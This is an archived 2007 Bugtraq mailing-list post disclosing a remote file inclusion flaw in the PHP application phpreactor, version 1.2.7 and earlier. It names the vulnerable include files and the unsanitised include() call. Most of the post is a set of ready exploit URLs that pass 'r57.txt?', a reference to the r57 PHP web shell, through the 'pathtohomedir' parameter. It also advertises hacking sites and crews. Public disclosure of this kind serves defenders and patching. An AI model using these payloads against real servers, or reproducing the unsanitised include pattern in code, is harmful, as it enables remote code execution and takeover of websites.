lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <BAY108-F36880F3475CA6E2BD14F5EA92C0@phx.gbl> Date: Fri, 01 Jun 2007 15:26:56 +0300 From: "pito pito" <the-modest-pirate@...mail.com> To: bugtraq@...urityfocus.com Subject: phpreactor <===1.2.7 remote file include ******************************************* *phpreactor <===1.2.7 remote file include * *url:http://sourceforge.net/projects/phpreactor/ * *author:titanichacker (egy-virus) * *contact: hack-teach.com & mohandko.com & tryag.com * *bug in : * * /inc/view.inc.php & inc/users.inc.php & inc/updatecms.inc.php & inc/polls.inc.php * * include($pathtohomedir."/inc/cms.inc.php"); * * * * * *exp===> * *http://localhost/phpreactor/inc/view.inc.php?pathtohomedir=r57.txt? * *http://localhost/phpreactor/inc/users.inc.php?pathtohomedir=r57.txt? * *http://localhost/phpreactor/inc/updatecms.inc.php?pathtohomedir=r57.txt? * *http://localhost/phpreactor/inc/polls.inc.php?pathtohomedir=r57.txt? * *and more * * thanx * cold-zero & mohandko & tryag & xp10 & drbaka & arb-hawk & kof2002 & ilw0rm * ******************************************************* _________________________________________________________________ Express yourself instantly with MSN Messenger! Download today it's FREE! http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/